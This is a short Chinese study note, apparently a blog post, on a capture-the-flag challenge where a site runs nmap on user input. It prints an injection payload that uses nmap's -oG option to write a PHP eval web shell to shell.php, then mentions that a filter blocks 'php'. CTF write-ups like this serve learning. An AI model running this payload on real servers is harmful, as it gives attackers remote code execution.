【学习笔记 48】 buu [网鼎杯 2020 朱雀组]Nmap
0x00 知识点NMAP中使用-0G命令可以实现代码写入0x01 解题思路打开网站一看发现是一个NMAP网站尝试输入输入任意ip可以看到这里返回了nmap扫描的结果,这里我们就想到了NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件' <?php @eval($_POST["cmd"]);?> -oG shell.php '尝试后发现报错,说明这里有过滤不能直接进行,最后利用fuzz发现过滤了php,
原创
2020-08-11 09:29:23 ·
683 阅读 ·
1 评论